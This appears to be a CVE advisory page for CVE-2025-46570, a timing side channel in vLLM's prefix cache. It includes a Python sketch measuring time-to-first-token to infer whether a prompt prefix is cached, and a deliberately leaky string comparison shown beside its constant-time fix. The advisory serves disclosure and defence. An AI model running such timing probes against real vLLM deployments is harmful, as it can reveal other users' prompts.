CVE-2025-46570

CVSS: 2.6 (Low)

Description

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed and the PagedAttention mechanism finds a matching prefix chunk in its cache, the prefill phase speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited, letting a remote observer infer whether a given prefix has already been processed. This issue has been patched in version 0.9.0.
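
For illustration, below is a minimal sketch of how such a discrepancy could be measured, assuming a vLLM server exposing the OpenAI-compatible /v1/completions streaming endpoint; the URL, model name, and prompts are hypothetical assumptions, not details from the advisory. The idea is to warm the prefix cache with one request, then compare the TTFT of a request sharing that prefix against one that does not.

    # Hypothetical sketch: observe prefix-cache timing via TTFT against an
    # OpenAI-compatible vLLM server. URL, model name, and prompts are
    # illustrative assumptions, not details from the advisory.
    import time

    import requests

    URL = "http://localhost:8000/v1/completions"  # assumed local vLLM server

    def time_to_first_token(prompt: str) -> float:
        """Seconds from sending the request until the first streamed token."""
        start = time.monotonic()
        with requests.post(
            URL,
            json={"model": "some-model", "prompt": prompt,
                  "max_tokens": 1, "stream": True},
            stream=True,
            timeout=30,
        ) as resp:
            for line in resp.iter_lines():
                if line:  # first non-empty SSE line carries the first token
                    return time.monotonic() - start
        return float("inf")

    # Warm the cache with one prompt, then compare a guess that shares its
    # prefix against an unrelated prompt. A consistently lower TTFT for the
    # shared prefix is the observable timing discrepancy (CWE-208).
    time_to_first_token("shared secret prefix ... original suffix")
    t_hit = time_to_first_token("shared secret prefix ... attacker guess")
    t_miss = time_to_first_token("completely unrelated prompt")
    print(f"TTFT with cached prefix: {t_hit:.4f}s, without: {t_miss:.4f}s")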

Product(s) Impacted

  • Vendor: vLLM
  • Product: vLLM
  • Versions: < 0.9.0

Weaknesses

Common security weaknesses mapped to this vulnerability.

CWE-208
Observable Timing Discrepancy
Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.
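
As a generic illustration of CWE-208 (not code from vLLM itself), the sketch below contrasts a short-circuiting comparison, whose runtime reveals how many leading characters of a guess are correct, with a constant-time comparison that removes the signal:

    import hmac

    def leaky_check(secret: str, guess: str) -> bool:
        # Returns at the first mismatching character, so runtime grows with
        # the length of the matching prefix: an observable discrepancy.
        if len(secret) != len(guess):
            return False
        for a, b in zip(secret, guess):
            if a != b:
                return False
        return True

    def constant_time_check(secret: str, guess: str) -> bool:
        # hmac.compare_digest takes time independent of where the inputs
        # differ, removing the timing signal.
        return hmac.compare_digest(secret.encode(), guess.encode())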

*CPE(s)

Affected systems and software identified for this CVE.

  • Type: a (application)
  • Vendor: vllm
  • Product: vllm
  • Version: < 0.9.0
  • Update / Edition / Language / Software Edition / Target Software / Target Hardware / Other: not specified

CVSS Score

2.6 / 10

CVSS Data - 3.1

  • Attack Vector: NETWORK
  • Attack Complexity: HIGH
  • Privileges Required: LOW
  • User Interaction: REQUIRED
  • Scope: UNCHANGED
  • Confidentiality Impact: LOW
  • Integrity Impact: NONE
  • Availability Impact: NONE
  • CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N


Timeline

Published: May 29, 2025, 5:15 p.m.
Last Modified: May 30, 2025, 4:31 p.m.

Status: Awaiting Analysis

This CVE has recently been published to the CVE List and received by the NVD.


Source

security-advisories@github.com

*Disclaimer: Some vulnerabilities do not have an associated CPE. To enhance the data, we use AI to infer CPEs based on CVE details. This is an automated process and might not always be accurate.